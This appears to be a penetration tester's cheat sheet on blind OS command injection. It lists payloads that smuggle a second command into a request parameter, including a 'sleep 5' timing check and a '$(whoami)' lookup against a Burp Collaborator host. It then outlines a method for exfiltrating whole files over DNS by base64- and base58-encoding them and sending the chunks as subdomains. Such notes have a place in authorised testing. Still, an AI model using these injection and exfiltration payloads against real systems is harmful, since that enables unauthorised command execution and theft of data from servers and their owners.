Normal


----------------------------------------------------------------------------------
Blind (Simple) BEST FOR POC

parameter=anything;sleep 5                     ---> Sleep 5 Seconds

or

parameter=anything;$(whoami).burp-collab.com   ---> Return USER.burp-collab.com

- *url econde* (Don't forget to URL encode)

Using DNS, you will be able to get a response on your burp collaborator with the response of the whoami command has a subdomain.

----------------------------------------------------------------------------------
Blind (Extreme) DNS data Exfiltration | EXTRACTING FILES

The same principle applies here, but we need to base64-encode the files first and then base58-encode the base64 output (since base64 uses three characters that are not compatible with domain names). After that, you'll need to split the base58 output into chunks of around 60 characters (as the limit is 63 characters per DNS label), sending them to the server one by one. Make sure to remove any duplicates before sending. Finally, decode the base58 and base64 to retrieve the original file content. 

- Target need to have base58 installed, otherwise do python script
- *Base64 encode your payload* & url econde

parameter=anything;PAYLOAD

Example ---> https://www.youtube.com/watch?v=o7oVWXw4t5E